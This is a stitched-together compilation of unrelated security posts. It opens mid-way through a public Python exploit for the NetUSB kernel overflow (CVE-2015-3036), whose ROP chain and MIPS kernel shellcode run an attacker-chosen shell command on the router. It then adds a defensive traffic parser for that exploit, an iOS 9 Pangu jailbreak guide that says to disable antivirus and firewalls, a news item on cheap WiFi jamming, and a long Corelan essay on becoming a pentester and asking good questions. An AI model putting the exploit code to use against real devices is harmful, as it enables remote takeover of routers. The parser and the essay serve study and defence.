branch back to previous 4 opcodes 0x03a0c821, # move t9, sp 0x0320f809, # jalr t9 0x3c181234, ] # append rop chain to buffer for w in rop: d += u32(w) # append decoder_stub to buffer for w in decoder_stub: d += u32(w) # encode stager and append to buffer for w in kernel_stager: d += u32(w ^ decoder_key) print "[>] sending computername_length.." time.sleep(0.1) s.send(struct.pack("<L", len(d))) print "[>] sending payload.." time.sleep(0.1) s.send(d) time.sleep(0.1) print "[>] sending stage2.." # a useful thing to do when you bust straight into the kernel # is to go back to userland, huhuhu. # thanks to jix for the usermodehelper suggestion! kernel_shellcode = [ 0x3c16dead, # lui s6,0xdead 0x3c19dead, # lui t9,0xdead 0x3739c0de, # ori t9,t9,0xc0de 0x2404007c, # li a0, argv 0x00972021, # addu a0,a0,s7 0x2405008c, # li a1, argv0 0x00b72821, # addu a1,a1,s7 0xac850000, # sw a1,0(a0) 0x24050094, # li a1, argv1 0x00b72821, # addu a1,a1,s7 0xac850004, # sw a1,4(a0) 0x24060097, # li a2, argv2 0x00d73021, # addu a2,a2,s7 0xac860008, # sw a2,8(a0) 0x00802821, # move a1,a0 0x2404008c, # li a0, argv0 0x00972021, # addu a0,a0,s7 0x24060078, # li a2, envp 0x00d73021, # addu a2,a2,s7 0x24070020, # li a3,32 0x3c190000, # [20] lui t9,call_usermodehelper_setup@hi 0x37390000, # [21] ori t9,t9,call_usermodehelper_setup@lo # call_usermodehelper_setup(argv[0], argv, envp, GPF_ATOMIC) 0x0320f809, # jalr t9 0x00000000, # nop 0x00402021, # move a0,v0 0x24050002, # li a1,2 0x3c190000, # [26] lui t9,call_usermodehelper_exec@hi 0x37390000, # [27] ori t9,t9,call_usermodehelper_exec@lo # call_usermodehelper_exec(retval, UHM_WAIT_PROC) 0x0320f809, # jalr t9 0x00000000, # nop # envp ptr 0x00000000, # argv ptrs 0x00000000, 0x00000000, 0x00000000, 0x00000000 ] usermodehelper_setup = target['gadgets']['call_usermodehelper_setup'] usermodehelper_exec = target['gadgets']['call_usermodehelper_exec'] # patch call_usermodehelper_setup into kernel shellcode kernel_shellcode[20] = kernel_shellcode[20] | 
(usermodehelper_setup>>16) kernel_shellcode[21] = kernel_shellcode[21] | (usermodehelper_setup&0xffff) # patch call_usermodehelper_exec into kernel shellcode kernel_shellcode[26] = kernel_shellcode[26] | (usermodehelper_exec>>16) kernel_shellcode[27] = kernel_shellcode[27] | (usermodehelper_exec&0xffff) payload = "" for w in kernel_shellcode: payload += u32(w) payload += "/bin/sh\x00" payload += "-c\x00" payload += cmd # and now for the moneyshot s.send(payload) print "[~] KABOOM! Have a nice day." Source: http://haxx.in/blasty-vs-netusb.py -
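A defender-side complement to the post above, added here and not part of blasty's script: a small Python 3 parser for the client half of the NetUSB handshake exactly as the exploit drives it (2-byte HELLO, 16 bytes of verify data, the 16-byte encrypted challenge reply, then a 4-byte little-endian computer-name length and the name), which flags any session whose declared computer-name length exceeds the 64-byte kernel stack buffer the SEC Consult advisory describes. The 64-byte bound is an assumption taken from the advisory rather than a value in the script, and the sample sessions are constructed test data, not captured device traffic.

```python
import struct

# Constants taken from the exploit's own handshake. MAX_COMPUTER_NAME is an
# assumption based on the SEC Consult advisory's description of the overflowed
# kernel stack buffer, not a value read from the device or the script.
NETUSB_PORT = 20005
NETUSB_HELLO = b"\x56\x03"
VERIFY_LEN = 16           # client sends 16 bytes of verify data
CHALLENGE_REPLY_LEN = 16  # client echoes the 16-byte random value, encrypted
MAX_COMPUTER_NAME = 64    # assumed safe upper bound for the computer name

HEADER_LEN = len(NETUSB_HELLO) + VERIFY_LEN + CHALLENGE_REPLY_LEN


def parse_client_stream(data):
    """Parse the client->device half of a reassembled NetUSB session.

    Returns None if the stream does not start with the NetUSB HELLO, otherwise
    a dict with the declared name length (None until the length field has
    arrived) and however much of the computer name has been seen so far.
    """
    if data[:len(NETUSB_HELLO)] != NETUSB_HELLO:
        return None
    if len(data) < HEADER_LEN + 4:
        return {"name_len": None, "name": b""}
    (name_len,) = struct.unpack("<L", data[HEADER_LEN:HEADER_LEN + 4])
    name = data[HEADER_LEN + 4:HEADER_LEN + 4 + name_len]
    return {"name_len": name_len, "name": name}


def assess_session(data):
    """Classify one client stream as ('ignore'|'benign'|'alert', reason)."""
    parsed = parse_client_stream(data)
    if parsed is None:
        return ("ignore", "stream does not begin with the NetUSB HELLO")
    if parsed["name_len"] is None:
        return ("benign", "handshake only, computer-name length not yet sent")
    if parsed["name_len"] > MAX_COMPUTER_NAME:
        return ("alert", "declared computer-name length %d exceeds %d-byte buffer "
                         "(CVE-2015-3036 overflow pattern)"
                         % (parsed["name_len"], MAX_COMPUTER_NAME))
    # A legitimate computer name is printable ASCII; raw machine code is not.
    if any(b < 0x20 or b > 0x7E for b in parsed["name"]):
        return ("alert", "non-printable bytes in computer name")
    return ("benign", "computer name of %d bytes" % parsed["name_len"])


def sample_session(name):
    """Constructed client stream for testing the parser; not real traffic."""
    verify = b"\xaa" * VERIFY_LEN
    reply = b"\x00" * CHALLENGE_REPLY_LEN  # placeholder for the encrypted random
    return NETUSB_HELLO + verify + reply + struct.pack("<L", len(name)) + name


if __name__ == "__main__":
    # Constructed sessions: a normal host, an oversized name, unrelated traffic.
    for label, stream in [
        ("normal host", sample_session(b"DESKTOP-PC")),
        ("oversized name", sample_session(b"A" * 200)),
        ("unrelated", b"GET / HTTP/1.1\r\n"),
    ]:
        verdict, reason = assess_session(stream)
        print("%-15s %-7s %s" % (label, verdict, reason))
```

In practice the stream would come from a TCP reassembly of traffic to port 20005 on the router; the length check is the cheap signal, since a legitimate Windows computer name never approaches 64 bytes.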
How to Jailbreak iOS 9 to iOS 9.0.2 on iPhone, iPad & iPod Touch Using Pangu Jailbreak
By Patrick Gumban, last updated October 14, 2015

It’s here folks, the very first jailbreak for iOS 9, and it’s Pangu who’ve beaten the other jailbreak teams to the punch. The best thing is that this iOS 9 jailbreak works on all supported devices, including the iPhone 6s and iPhone 6s Plus. Below, we’ll show you the steps on how to jailbreak iOS 9 – iOS 9.0.2 on iPhone & iPad using Pangu Jailbreak.

Before you proceed:

- The jailbreak is only available for Windows. Mac users will have to run a virtual machine to use the Pangu iOS 9 jailbreak.
- The jailbreak works for iOS 9, iOS 9.0.1 and iOS 9.0.2.
- Pangu is an untethered jailbreak and will work on all iOS 9 supported devices.
- Back up your iDevice via iCloud or iTunes to save important information, just in case something goes wrong.
- For good measure, disable anti-virus programs and firewalls, since they don’t play well with the Pangu jailbreak.

How to Jailbreak iOS 9 to iOS 9.0.2 on iPhone, iPad & iPod Touch Using Pangu Jailbreak:

1. Download the latest version of Pangu Jailbreak (Pangu 9 v1.0.0).
2. Disable Passcode by going to Settings > Touch ID & Passcode > tap Turn Passcode Off.
3. Disable Find My iPhone by navigating to Settings > iCloud > Find My iPhone and toggling Find My iPhone to off.
4. Enable Airplane Mode by going to Settings, then toggling the Airplane Mode switch to on.
5. Connect your iPhone, iPad or iPod touch to the computer via USB.
6. Run the Pangu executable you’ve downloaded in step 1 as an administrator. Right-click on the executable file and select “Run as administrator.”
7. As you open Pangu, your device should be detected. Click the Start button to proceed.
8. On the next page, click the Already Backup button.
9. The Pangu app will now start the jailbreak. Your device will reboot and at around the 65% mark, you will be asked to re-enable Airplane Mode.
10. At the 75% mark, you will be asked to unlock your iDevice and run the Pangu app from the Springboard.
11. There will be a message from the Pangu app asking your permission to access the Photo library. Tap Accept, then OK on the next dialog.
12. The jailbreak process will now continue and once the progress bar is complete, your iOS device will reboot. You should see Cydia sitting nicely on your Springboard.

And that’s it! Your iPhone, iPad or iPod touch is now jailbroken on iOS 9. A big thanks to the Pangu team for releasing such an early jailbreak. Sound off in the comments if you have questions about the guide.

Source: How to Jailbreak iOS 9 to iOS 9.0.2 on iPhone, iPad & iPod Touch Using Pangu Jailbreak
-
WiFi jamming attacks more simple and cheaper than ever
Posted on 13 October 2015.

A security researcher has demonstrated that jamming WiFi, Bluetooth, and Zigbee networks is not difficult to perform but, most importantly, also not as costly as one might think.

According to Mathy Vanhoef, a PhD student at KU Leuven (Belgium), it can easily be done by using a $15 Wi-Fi dongle bought off Amazon, a Raspberry Pi board, and an amplifier that will broaden the range of the attack to some 120 meters. The attack would hit all devices within range that operate in the 2.4 and 5 GHz bands.

With the above mentioned networks being crucial to the functioning of many IoT devices and systems - home security systems, car locks, baby monitors, and so on - it should be obvious that the fact that these attacks can be performed so easily and cheaply may lead to serious consequences. In fact, it is known that cheap jammers are already being used by crooks around the world. That's why it's crucial that defenders are able to detect these attacks when they are going on, even if they can't stop them.

During his recent presentation at BruCON, Vanhoef explained that by modifying the dongle's firmware he was able to force the target networks to always give priority to the device's transmissions. If the device is made to transmit continuously, it means that all other devices won't be able to, making the channel effectively unusable.

His attempts at selective jamming (blocking specific packets) have been less successful, and he concluded that 100% reliable selective jamming is not possible.

He also says that these low-level jamming attacks could influence attacks on higher level protocols. For example, he says that they can be used to mount a channel-based MitM attack against WPA's Temporal Key Integrity Protocol (TKIP), which is still widely used.

For those interested in more details, here's a video recording of Vanhoef's talk:

Source: WiFi jamming attacks more simple and cheaper than ever
-
How to become a pentester Published October 13, 2015 | By Corelan Team (corelanc0d3r) Intro I receive a lot of emails. (Please don’t make it worse, thanks!) Unfortunately I don’t have as much spare time as I used to, or would like to, so I often have no other choice than to redirect questions to our forums or our IRC channel (#corelan on freenode), hoping that other members of the community will jump in and help me answer those questions. One of the most frequently asked question is “how do I become a penetration tester”. Depending on whom you ask this question, you may get different results or may be told to take a specific approach. With this post, I am trying to formulate my views on this question (with a focus on the process and not so much on the technical aspect), in an attempt to hopefully provide a good starting point for those that find themselves in a similar situation. For the record, I am not a penetration tester… but I try to apply common sense (seasoned with a touch of plain logic) to challenges and pretty much all situations in life. Don’t hesitate to provide feedback, suggest changes or tell me to STFU and GTFO. Any motivated additions or changes to this post are more than welcome, and I’ll update this page as needed. Where to start … or ? There are a couple of approaches to getting started with information security. Approaches change as time flies by, technology changes, new platforms are designed & implemented, etc… All of this influences what is supposed to be the latest “hot” topic to dive into. Before doing so, regardless of the approach you take, there are 2 fundamental questions you should ask yourself: 1. How much effort (time, …) am I willing to put into this? I have been working on exploit development for many years. Truth is that I don’t have an advanced background in systems programming, not been trained in latest technologies. All it took was a lot of time & dedication, a strong will to learn and absorb new things. 
You can learn as fast as your brain is able to process and remember, and practise is able to lock down into your mind, converting the knowledge into experience. Some people learn fast, others need more time. Nothing wrong with both approaches, but being self-aware, self-conscious about your abilities and being realistic about the time you’re able & willing to invest into supporting the learning process is important. Another factor to take into consideration is your balance between the various powers that play in life. If you have a family, make sure to talk with your family members and find a good balance between spending time with them, and spending time on this learning experience. Even if you’re alone, get out from time to time. Don’t rush into things, but try to dose and apply a healthy time-consumption model. Let your brain process, think, and take your time. This “time” factor brings us to the second point: 2. What is my goal? People set goals all the time. Goals can be far away in terms of knowledge & experience needed, they can be even so far away that they look more like a dream than anything else. The good news is that it is OK to be ambitious and to have dreams. However, from my experience, it will be easier to achieve your ambition by breaking the dream into smaller objectives, into smaller goals. So, my (quite limited) definition of a goal or target is something realistic, something you can achieve, using one or more steps (actions). We can discuss about semantics, words and definitions, but that’s not the point of my statement. Let’s apply the dream/goals/targets logic to the topic of this post. Let’s assume it is your dream to become a pentester. The concept of being a pentester is quite exciting, but it’s quite vague at the same time. What exactly do you want to do? What type of pens .. errr.. targets do you want to test. Why do you want to do it ? 
If you don’t have the answer yet, it might be useful to talk to pentesters and ask what type of work they do, and see if you are interested. Let’s say your ideal scenario involves testing the overall security level of corporate networks, perform audits against web applications and do something with “mobile devices” because that’s what people told you. Perhaps it’s social engineering. It doesn’t matter what you select, those are your goals. They are part of the “pentester” definition, but you’ve just broken down the dream into goals & targets. Why am I being so philosophical about it? Well, becoming a pentester who is specialized in all types of audits may not be realistic after all. Technologies change so fast that it may not be possible to become an expert at everything, right away. Trying to understand & master everything would not be a realistic goal. It might still be a dream though, and you might eventually get there. It all depends on how much effort you’re willing to invest. Taking this one step further, don’t be discouraged nor too enthousiastic by what other people say. Timings are personal, there is no good or bad. The god news is : you can do whatever you want, some things will take more time than others. It’s not about “IF” you can do it, it’s about “WHEN”, and how realistic this “WHEN” is. Being a pentester does not mean being good at using tools either. It’s about being able to understand how things work, how things are configured, what mistakes people make and how to find those weaknesses by being creative. Being a pentester is not about launching Metasploit against the internet. A couple of years ago, I got interested in photography. After taking many pictures using my smartphone and being encouraged by family members that kept repeating how great my pictures were, I decided to buy a DSLR. Guess what. Buying a better camera or lens doesn’t make me a better photographer. 
In fact, it made things worse because I didn’t understand how light works, how a camera can be tuned to deal with the light and how we can influence light to get better pictures. Smartphones are designed so you wouldn’t have to think about it. Beginners mistake. The reality is that learning how things work is time consuming, frustrating… but it will be rewarding in the end. I’m still not a good photographer, but I don’t mind admitting it either. I consider this to be a journey and at least I’m determined to understand the fundamentals first; to try and to make mistakes a lot; and not to be afraid to ask for help. So, this brings me back to the original question: “Where to start”. It should be clear by now that perhaps you should try to answer “where do you want to end” first, as this will tell you where to start. Don’t worry, even if you make mistakes, even if you find out that you picked the wrong (“less exciting”) targets, you still win. Any knowledge you gain is valuable to a certain extent and can be helpful along the way. There is a second way to look at the “goal”. You can also define your goal as “your ability to generate an income”. Let’s assume, for the sake of this post, that you would like to make money as a pentester. This means that you may have to select certain technical objectives (knowledge) that will provide economical value. This could be driven by popularity of certain types of technology (web apps, for example); or relatively new areas (Internet Of Things, Mobile, …). So, even if you want to do many things (and should be looking at a broader perspective), there is a big chance that you will have to specialize in specific areas. Before continuing, I’d like to @thelightcosine quoting HD Moore: “If you don’t think you’re a n00b, you’re not trying hard enough”. Challenge yourself. Try to learn more about something, try to gently push your limits, but do it in a realistic way. Never give up. It’s a painful, long, but very rewarding journey. 
Ok, got it. So, where to start ? Assuming you know where you want to end, and you have a realistic plan that involves dedicating time and efforts; what should you do with your time? Before talking about possible roads, I’d like to briefly mention something that will become the most important part of your journey. It’s YOU & your attitude & mindset. You’ll be the one doing the work. You’re the one that sets goals and wants to start working. You’re the one that will make this work. But it requires a specific attitude to do so. It’s the so-called “hacker” attitude. There are many definitions of the word hacker; but most of them boil down to this: A desire to understand how things really work, so you can optimize/change the behaviour, or apply the understanding to bend the rules of the game. Hackers tend to break stuff; penetration testers tend to break stuff too. The goal should be to break stuff in order to come up with solutions on how to improve it. If the purpose is to break stuff so you can prove you can break stuff, and systems/people have flaws… Newsflash: we already know that. You’re wasting your time. You’re a breaker, not a hacker. If you truly want to be a hacker, break stuff because you want to fix it, make it better. The word hacker can be applied to many disciplines. It doesn’t need to be tied to computers, it can be applied to science in general as well. In fact, without hackers, we would not have medicines, or technological evolutions. Be critical about what you see. Try to understand what you see. Ask questions and don’t accept the “I don’t know, that’s how it works, that’s what someone told me, just accept it and move on”. Ask yourself the question “what would I do if I had to design X or Y”. Putting your thought process into the mindset of someone else will help you understand why things work the way they work, how they were designed, and how people use them the way they use them. 
Using empathy & understanding that other people have different views will broaden your understanding of things, which in return will help you to discover strengths and weaknesses. Being a hacker is not technical. It’s a mindset, it’s psychology. It’s beautiful. It’s very powerful. (Sidenote: I am truly blessed to be able to spend time with extremely intelligent hackers all over the world. Each of us has the potential to change something, to improve something. We can even change the world; if we would organize ourselves in a better way. Maybe it’s time for selecting a new dream, a dream that involves hacking the world. Anyways… ) Ok Ok, cut the crap, where to start? Hold on. We’re almost there. Before giving you some hints on how to approach your journey, I’d like to share some thoughts on asking questions. In fact, unless you’re born with all the answers already, you’ll probably end up asking questions. Even if you know what your ultimate goal is, you may not know how to get there, or what is needed to get there. The only way to figure out is by asking questions. Interestingly enough, the way you ask a question and the type of questions you ask, will determine whether you get the answer you need or not. I often hang out in various channels on IRC and I’ve been subscribed to a bunch of mailing lists for a long time. I see people asking questions and other people trying to answer questions on a daily basis. You would think that asking or answering questions is a trivial thing, but interesting enough, people get yelled at, kick-banned from IRC channels, or humiliated in public just because they were trying to find the answer to something they don’t know. Lots of people end up frustrated because they failed at getting a satisfactory answer, and other people get frustrated because they felt they were wasting their time. 
What exactly causes this conflict and how can both parties be more effective at asking and answering questions, and hopefully avoiding painful situations? Most of the items below are based on cases where direct interaction is possible (IRC, Instant Messaging, and so on), but they can be generalized very easily and are applicable to any form of communication (email, support form, forum). Asking questions Asking questions is very easy. Asking a good question seems to be far from easy. What does it take for a question to elicit a valuable answer and how can you avoid that people will start throwing tables, bicycles and elevators at you because you just wanted to get an answer? I’ve tried to gather some ideas on how to be more efficient at asking questions and increasing your chance on not only getting an answer, but also getting a helpful answer. A few years ago, I did a small survey on Twitter to discover what people believe are the ingredients of a “bad” question. The results included: No indicators that the person asking the question did any of their own research or attempted to find an answer, Googling Bing or Binging Google; When the question is ambiguous; When you forget to ask the question; Massive preamble to get to the question. There are a couple of things you can do to avoid common pitfalls and getting your question labeled as “bad”. For starters, I don’t think bad questions exist. There’s always a reason for a question, or logic behind a question. It just may not be clear what it is exactly, because of poor communication or other reasons, but that doesn’t make the question bad. I’m listing some ideas below, in no particular order. Avoid the obvious answer. Think about your question. How easy would it be to find the answer online, on Wikipedia, via a simple Google search or by reading product documentation? If you’re lazy, don’t expect people to show appreciation for that. Trust me, being honest about your laziness, won’t help either. 
If you get kickbanned from IRC because you are lazy and you advertise or admit it, you probably deserve it. Show that you deserve an answer and anticipate. Do your homework. See what you can find about your problem on the Internet, try a few things yourself and document what you did. Be prepared to show what you did. Be honest and accurate. People are more likely going to help if you show that you have tried and willing to try more. As soon as people sense that you just want to be spoon-fed, your support channel is going to blow up in your face. People might ask you to reproduce the steps you took to end up in your current situation, so you can anticipate to that. Put your documentation and procedure on Pastebin or Pastie before asking the question and be prepared to provide a link to your documentation when needed. Don’t leave out vital information or be embarrassed about something you did even if you think you shouldn’t have done it. It might very well be part of the problem and if you want a solution, you’d better be honest. Be as factual as possible in describing your problem and don’t let your thought process take over. Describing the symptoms and the exact steps needed to reproduce the symptoms will work better than explaining what you think the problem is. You may have missed something obvious and if you don’t share all the facts, people may not be able to discover what really went wrong. If you’re trying a procedure or a tool and you get an error message, there’s a chance that other people have encountered the same situation. Google for the error message (leaving out specific parts such as IP addresses, and so on) and see what you can find yourself. Make sure to construct your question in a way that would make people believe you just want a gentle push in the right direction. 
Instead of asking “I don’t understand how this works” or “I want to hack Gmail” you could also ask “What would you recommend I should learn to do this or that”, or “Does anyone have any recommended sources about SQL injection against an Oracle database”? You’re trying to achieve the same goal and you’re pretty much asking for the same thing, but you’re shifting the focus to the process of learning and finding a solution instead of drawing attention to the problem or goal itself. It’s perfectly fine to ask for “some pointers in the right direction”.There’s a famous Chinese proverb that says “Give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime”. If you have a problem, you may choose the fastest and easiest path and get someone to fix it for you by giving you the solution right away. If you’re taught how to troubleshoot a problem, you may be able to increase your insight and improve your ability to prevent and fix future issues yourself. The more you focus your question on what you can do and should do yourself, the easier it will be to convince someone to help you out. What also often helps is to explain your problem to a friend first. In some cases, explaining the problem and allowing a friend to try to understand the problem might also expose the solution. This has happened to me and helped me in numerous cases. In short, the more work you put into finding a solution yourself, the more precise your question will be and people will appreciate that. Break things apart and be critical to yourself. Before asking a question, break down your question into technical layers and components. Do you fully understand the other components or prerequisites needed to reproduce your problem? If you are asking a question about attacking a remote computer, make sure you understand the networking layer and have checked that everything is set up correctly between your device and the remote computer. 
If you don’t know enough about networking, you shouldn’t be attacking something that uses the network. Don’t forget or ignore that others had to go through the same learning experience as you did and had to work to for it. If your question suggests that you just want to skip learning fundamental knowledge, people may be offended because you’re basically disrespecting the hard work hey have done in the past. Consider there is a possibility that you still have a long way to go, and that “understanding” something doesn’t necessarily mean you are applying it in the right way. Instead of asking why a certain technique for a certain case doesn’t work, you may need to wonder whether you fully understand the technique or not. Don’t start with an apology. There’s no need to apologize for not knowing something. It usually only makes people raise an eyebrow for a brief moment and move on. You should only apologize to yourself for not asking proper questions or for not being prepared to work or learn. Don’t apologize for your lack of speaking or understanding English. People don’t care. If it’s bad, they’ll notice it’s bad. You have the opportunity to improve your English by reading documents, interacting with people, so you might as well do something about it. If you’re unsure, prepare your question in advance and relax. If you’re asking a good and well-prepared question, nobody will even notice. Of course, if support is available in your native language, that should be your first option. I’m not trying to say that apologizing is a bad thing. It’s a token of maturity and respect, and can be very powerful in conflict situations and negotiations. I’m just not convinced it will help you getting an answer. Don’t hide behind the fact that you don’t speak a language very well in order to insult people. I’ve seen this happen before: somebody walks into an IRC channel, starts by apologizing for his bad English, and then blatantly insults everyone in the room. Bad idea. 
Excuses are not a magic patch for stupidity. Be nice, polite and don’t be impatient. Even if your question is urgent, if you decide to rely on community support, you also have to realize and accept that people have lives too and may have other priorities than answering your question. Asking “why” you’re not getting an answer after 10 minutes may trigger people to ignore you, so don’t do that. Maybe you need to rethink your question instead, or find another source of information or support. Public forums and IRC channels are not private support channels. Don’t expect the entire world population to care about your problem, so make sure not to flood the channel with your issues. Although IRC and Instant Messenger tools allow for direct communication, it doesn’t guarantee that the communication will take place when you want it and at the speed you want it. Timezones are real and the people that have the answer may be asleep. Accept it. Even if you think a tool is terribly broken, focus on what you may potentially have done wrong. Others will appreciate if you ask “what I have done wrong” or “what you should do different” even if it’s a genuine bug in an application or tool. If you start by saying you believe a certain tool is broken or ask “why” a tool is broken, you’re going to draw attention to yourself in a bad way. One bug in a tool doesn’t make the tool bad, so don’t disrespect the work of many people who may be reading your comments.You’re the one to open a discussion, and you’ll never get a second chance to make the first impression. The tone for the rest of the discussion is going to be set as soon as you initiate the communication, so be nice and respectful. Only make jokes if you’re sure others will understand and appreciate the joke, and won’t be offended by it. You don’t know who’s behind the computer at the other side, so avoid anything that is potentially offensive, sexual oriented, inspired by religion. 
Understand that there are different cultures, different points of view, different people. None of them are good or bad, better or worse. A lot depends on how well you know the people you are addressing. (Sidenote: this is also why a “hacker culture” doesn’t really exist. We’re all individuals, with different backgrounds, cultures, beliefs. It doesn’t matter what you look like, what language you speak, what clothes you wear, or what the color of your skin is. You’re a hacker by the things you do, and why you do them.)

Jokes about yourself or your situation are an exception of course, and are often perceived well. Complaining about your crappy Internet connection and how it makes you consider sending faxes again, or making a comment about how your dog is so fat that it interferes with the Wi-Fi signal in the house, are just a few examples of how to help set a friendly tone. Be creative, don’t overdo it and choose your timing carefully.

Maybe you are impressed by the skills of the people you’re going to address when asking your question. Don’t start yelling how “l33t” or “pro” you think they are, and how easy it would be for those people to answer your question. This may set off some red flags and make people think you’re a troll. Be yourself, act normal, be polite and you’ll be fine.

Make it easy to answer. If your question is too broad or contains too many elements that are open for interpretation, ambiguous, questionable or vague, don’t expect anyone to take a few weeks of holidays to show you around.

Choose your audience. What would be the best place to find an answer to your question, and who would be the right person to answer it? Forums and IRC channels often focus on a certain topic, so try to pick the right medium and channel to ask your question. If your question is related to the use of a tool, it might be a good idea to find other users instead of sending your questions to the tool developers right away (or use the support mechanisms they made available).

Ask the question. Don’t start by asking if you can ask a question. There’s no need to ask if someone is online or available to answer your question. Just ask the bloody question. If someone is online and your question makes sense, you’ll get an answer. Unless you are picking up where you left off from a previous discussion, don’t target a specific person. Other people might ignore your question if you’re suggesting that only a particular person can answer the question.

If you want to get an answer, make sure it is perfectly clear what the question is. If you simply state “I have a problem with X or Y”, “This tool doesn’t work” or “My exploit got detected by Antivirus”, you’re technically just making a statement and not asking a question. Asking what you did wrong or what you can do to make something work (better) is more likely going to get you what you want. Even if you have to explain the context of your problem, try to keep it short and to the point, and move to asking the question as soon as you can.

Listen, interact and seek clarification if needed. Try to understand the answer and don’t reply to it right away. If someone tells you to investigate something else, do it. Don’t keep hammering away, ignoring advice that was given to you. If an answer is not clear, ask for clarification, but do it in a way that suggests you’re trying to learn (process) and not trying to be spoon-fed (solution). As explained earlier, the better you are at setting the right tone and suggesting you only want some hints in the right direction, the higher the chance someone will help you. When asking for clarification, try to formulate it in a way that explains what you did and didn’t understand.
Rephrasing or summarizing certain parts often helps to show what part of the answer was clear, and what requires further clarification. Rephrase, or consider starting a new question with:
If I understand you correctly,
What you’re saying is that…
In other words,
What if
Does that mean…

In the event you didn’t understand the answer at all, don’t be afraid to say so. Ask if that person could rephrase, explain something in a different way or elaborate on a certain part of the answer, and do it in a polite manner.

Be grateful & give back when you can. If someone tried to help you, tell that person you appreciate the help, even if it didn’t fully answer your question. Realize that a lot of people have other things to do than answering questions. If they are trying to help, it’s because they want to help, despite tight schedules, deadlines at work and other priorities. Credit them for taking the time. Do it in a short, clear and efficient way. Mention how the answer was helpful.

If you have the impression the question you asked is a very common question, and your gut feeling says that the person who answered the question is actually getting sick and tired of having to address the issue over and over, you may want to consider lending him a hand. Document your question and the solution and put it online somewhere. It will help you to understand the cause and the solution, you can ask the person who helped you to verify your document to make sure it’s accurate, and you can help other people by simply pointing them to your online document. It demonstrates you want to learn, you’ve listened and you want to give back. Don’t wait to share until you have all the answers. Guess what, you’ll always find another question.

Answering questions

Asking good questions is definitely an art that requires a bit of preparation. Answering questions, if you really want to help someone, is not trivial either.
Although some cases may suggest the opposite, there’s no such thing as dedicated askers and dedicated answerers (not sure if that is even a valid word). No matter how experienced you are, you might still find yourself on both sides of the story from time to time. When you’re in the position to be able to answer a question, you really are in a unique situation. Think about it: you have the power to decide whether you want to answer the question or not, and on top of that, you can choose how to answer the question, which will have a direct impact on whether the answer will be valuable or not. If you decide to take the time to answer a question with the intent of helping somebody, you might as well do things right. Maybe some of the following guidelines may be of assistance:

Be nice. There is a reason why the question was asked in a certain way. You should be able to sense the difference between somebody who’s after a quick win and somebody who is genuine, who really wants to learn, but doesn’t know how to communicate well. When you’re not sure, grant the person the benefit of the doubt; you can still yell at him later. There’s an easy way to help someone if they were too vague or didn’t make themselves clear. Simply rephrase the question and ask if that is what they want to know, or just tell him his question didn’t make any sense and ask that person to be more specific. It will make sure you properly understand the question and it will show the person how to properly phrase a question next time. There’s no reason to make fun of someone or make him/her feel bad. He or she already admitted being in the dark about something.

Think before you answer, ask for more info. Do you really understand the question? Is your answer going to be helpful? Ask for clarification if the question is not clear. Rephrase; ask for an example. Try to reproduce the steps needed to come to a problem and ask for more details and documentation.

Don’t answer because you have to. Only answer a question because you want to help, and have the time to help. Although the first question may seem reasonable, it might get worse very easily. If you decide to step in to help someone, at least you’ll have to try to get the asker onto the right path, and it’s hard to estimate upfront how much time you’ll need for that. If you do things right and understand the question well, it shouldn’t be too difficult or time consuming to answer the question right away, or point the asker to the correct resources.

Reply with a question. Tricky one. Some people enjoy doing this all the time, which can totally freak people out and destroy normal communication, so make sure to use this technique in specific cases only. There certainly is a lot of value in replying with a question, provided that the question suggests a solution, or aims at getting more information. Let’s take a look at a quick example:

Question: “I ran an exploit against a target computer and the exploit says I was not able to get a reverse shell.”

Many things could be wrong with this scenario, making it hard to answer the question in just a few words. Asking a few short questions might put the guy back to work, trying to get more details on why his procedure didn’t work. You could for instance ask if both hosts are able to connect to each other. This suggests that there might be a network related issue. It shows that you understand the individual layers related to the act of exploiting a remote computer, and you help him use a structured approach to troubleshooting this kind of problem.

Asking questions about the question itself might reveal underlying reasons and motives. Sometimes people are too embarrassed to admit something, because they can almost sense they are doing it wrong, or perhaps they know they are doing something illegal.
By asking specific questions about why they want to do something, or suggesting that they do things differently (in a way that wouldn’t involve potentially illegal activity), you might get some helpful information about that person and whether his intentions are legit or not. If someone is having problems running an exploit against a machine on the Internet, you may want to suggest that he simulate the procedure in a private lab. If the person chooses to ignore your suggestion and insists he wants to do it over the Internet, you’re almost positive he’s up to no good.

Try to discover what the person is trying to do. If someone asks if it would be possible to do a certain thing, ask him what he’s trying to achieve. Ideally, it will force the person to explain and reveal any underlying motives.

Be honest. If you’re not sure about the answer, just say so. There’s nothing wrong with admitting you don’t know something for sure. Guessing is acceptable, as long as you make clear you are guessing. It may suggest possible solutions and perhaps put the person on the right track already.

Stimulate, don’t burn. You can demonstrate your skills by providing a helpful answer, not by showing off, emphasizing how smart you are. Based on how specific the question is, and how it reflects the level of knowledge possessed by the inquirer, you can adjust the level of detail of your answer accordingly. If you need to explain that something is wrong or bad, don’t forget to explain why it is wrong or bad and give pointers on how to avoid or fix the issue. You don’t need to answer questions in detail, as if you’re reading a tutorial to them. A gentle push in the right direction is often good enough to stimulate the learning process. It’s ok to put someone on the right path and point him to the resources he should study if he wants to make progress in the future, but don’t just throw URLs at him. If the other person understands why he needs to learn something, it will be easier to convince him to make the effort to do so. Of course, if the same person just continues to ask questions and doesn’t want to take the time to learn things properly, your answers are obviously not going to help anymore, and that person probably doesn’t want to be helped. He just wants someone to do the work for him. In that case, there’s no value in trying. Wait until the person has figured out he needs to work for it, and ignore him until he proves it.

Language. English is an important language in international IT or Infosec communities. However, that doesn’t mean everybody is a native English speaker or even remotely close to that. The use of common and universal terminology is perfectly fine, but try to keep your sentences as simple as possible. We don’t want to make the poor guy suffer more than necessary, do we? If you notice during the conversation that the other guy didn’t really understand your answer, challenge him and verify that he understood what you said. Try to figure out if it’s a language issue or a knowledge issue. If it’s the first time both of you are talking, it might be acceptable to just ask the asker if he understood what you said, so you can adjust your vocabulary if needed. See if you can give an example to clarify, or just ask a question about your explanation. If you’re in a kind mood, you could say something that would suggest that it’s ok to ask more questions if needed, which should break the ice if the inquirer is a bit shy.

Spot the troll. Surely, there are people with too much time on their hands, without a real life, trying to waste everyone’s time by asking a combination of stupid and intelligent questions, just for the fun of it. A small minority of these so-called trolls actually master the subtleties involved very well and might make it sound like they have a real question, and then continue to combine silly questions with good questions.
If done well, these folks might actually keep you busy for a while. Luckily, most trolls have bad ninja skills and can be easily recognized. Wasting the time of brave volunteers and people who really want to help is not very nice. Getting kickbanned, they should.

